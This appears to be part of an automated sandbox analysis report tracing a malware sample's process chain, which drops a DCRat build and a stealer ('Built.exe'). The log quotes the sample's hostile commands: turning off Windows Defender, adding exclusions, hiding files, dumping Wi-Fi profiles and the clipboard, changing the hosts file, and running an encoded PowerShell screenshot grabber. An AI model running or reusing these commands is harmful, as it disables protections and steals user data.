    Source: C:\agentInto\fontsessionruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
    Source: C:\agentInto\fontsessionruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
    Source: C:\agentInto\fontsessionruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
    Source: C:\agentInto\fontsessionruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
    Source: C:\agentInto\fontsessionruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
    Source: C:\agentInto\fontsessionruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
    Source: C:\agentInto\fontsessionruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
    Source: C:\agentInto\fontsessionruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
    Source: C:\agentInto\fontsessionruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
    Source: C:\agentInto\fontsessionruntime.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
    Source: C:\Users\user\Desktop\QIjBj1l8We.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
    Source: C:\Users\user\Desktop\QIjBj1l8We.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\Built.exeFile read: C:\Windows\System32\drivers\etc\hosts
    Source: QIjBj1l8We.exeVirustotal: Detection: 86%
    Source: QIjBj1l8We.exeReversingLabs: Detection: 92%
    Source: unknownProcess created: C:\Users\user\Desktop\QIjBj1l8We.exe "C:\Users\user\Desktop\QIjBj1l8We.exe"
    Source: C:\Users\user\Desktop\QIjBj1l8We.exeProcess created: C:\Users\user\AppData\Local\Temp\x12.exe "C:\Users\user\AppData\Local\Temp\x12.exe"
    Source: C:\Users\user\AppData\Local\Temp\x12.exeProcess created: C:\Users\user\AppData\Local\Temp\x11.exe "C:\Users\user\AppData\Local\Temp\x11.exe"
    Source: C:\Users\user\AppData\Local\Temp\x11.exeProcess created: C:\Users\user\AppData\Local\Temp\x10.exe "C:\Users\user\AppData\Local\Temp\x10.exe"
    Source: C:\Users\user\AppData\Local\Temp\x10.exeProcess created: C:\Users\user\AppData\Local\Temp\x9.exe "C:\Users\user\AppData\Local\Temp\x9.exe"
    Source: C:\Users\user\AppData\Local\Temp\x9.exeProcess created: C:\Users\user\AppData\Local\Temp\x8.exe "C:\Users\user\AppData\Local\Temp\x8.exe"
    Source: C:\Users\user\AppData\Local\Temp\x8.exeProcess created: C:\Users\user\AppData\Local\Temp\x7.exe "C:\Users\user\AppData\Local\Temp\x7.exe"
    Source: C:\Users\user\AppData\Local\Temp\x7.exeProcess created: C:\Users\user\AppData\Local\Temp\x6.exe "C:\Users\user\AppData\Local\Temp\x6.exe"
    Source: C:\Users\user\AppData\Local\Temp\x6.exeProcess created: C:\Users\user\AppData\Local\Temp\x5.exe "C:\Users\user\AppData\Local\Temp\x5.exe"
    Source: C:\Users\user\AppData\Local\Temp\x5.exeProcess created: C:\Users\user\AppData\Local\Temp\x4.exe "C:\Users\user\AppData\Local\Temp\x4.exe"
    Source: C:\Users\user\AppData\Local\Temp\x4.exeProcess created: C:\Users\user\AppData\Local\Temp\CheatLauncherV2.exe "C:\Users\user\AppData\Local\Temp\CheatLauncherV2.exe"
    Source: C:\Users\user\AppData\Local\Temp\CheatLauncherV2.exeProcess created: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe "C:\Users\user\AppData\Local\Temp\DCRatBuild.exe"
    Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\agentInto\ygzWE.vbe"
    Source: C:\Users\user\AppData\Local\Temp\CheatLauncherV2.exeProcess created: C:\Users\user\AppData\Local\Temp\Built.exe "C:\Users\user\AppData\Local\Temp\Built.exe"
    Source: C:\Users\user\AppData\Local\Temp\CheatLauncherV2.exeProcess created: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe "C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe"
    Source: C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\QIjBj1l8We.exeProcess created: C:\Users\user\AppData\Local\Temp\Built.exe "C:\Users\user\AppData\Local\Temp\Built.exe"
    Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Built.exe'"
    Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\AppData\Local\Temp\Built.exe""
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Built.exe'
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\AppData\Local\Temp\Built.exe"
    Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
    Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
    Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
    Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
    Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
    Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
    Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
    Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\AppData\Local\Temp\Built.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\getmac.exe getmac
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gkfhm5n3\gkfhm5n3.cmdline"
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESDAF6.tmp" "c:\Users\user\AppData\Local\Temp\gkfhm5n3\CSCE3FF6834DD6C4DE392BB63A4482876F5.TMP"
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\agentInto\pR9EprN9daTFn7S7o.bat" "
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\agentInto\fontsessionruntime.exe "C:\agentInto\fontsessionruntime.exe"
    Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\QIjBj1l8We.exeProcess created: C:\Users\user\AppData\Local\Temp\x12.exe "C:\Users\user\AppData\Local\Temp\x12.exe" Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x12.exeProcess created: C:\Users\user\AppData\Local\Temp\x11.exe "C:\Users\user\AppData\Local\Temp\x11.exe" Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x11.exeProcess created: C:\Users\user\AppData\Local\Temp\x10.exe "C:\Users\user\AppData\Local\Temp\x10.exe" Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x10.exeProcess created: C:\Users\user\AppData\Local\Temp\x9.exe "C:\Users\user\AppData\Local\Temp\x9.exe" Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x9.exeProcess created: C:\Users\user\AppData\Local\Temp\x8.exe "C:\Users\user\AppData\Local\Temp\x8.exe" Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x8.exeProcess created: C:\Users\user\AppData\Local\Temp\x7.exe "C:\Users\user\AppData\Local\Temp\x7.exe" Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x7.exeProcess created: C:\Users\user\AppData\Local\Temp\x6.exe "C:\Users\user\AppData\Local\Temp\x6.exe" Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x6.exeProcess created: C:\Users\user\AppData\Local\Temp\x5.exe "C:\Users\user\AppData\Local\Temp\x5.exe" Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x5.exeProcess created: C:\Users\user\AppData\Local\Temp\x4.exe "C:\Users\user\AppData\Local\Temp\x4.exe" Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\x4.exeProcess created: C:\Users\user\AppData\Local\Temp\CheatLauncherV2.exe "C:\Users\user\AppData\Local\Temp\CheatLauncherV2.exe"
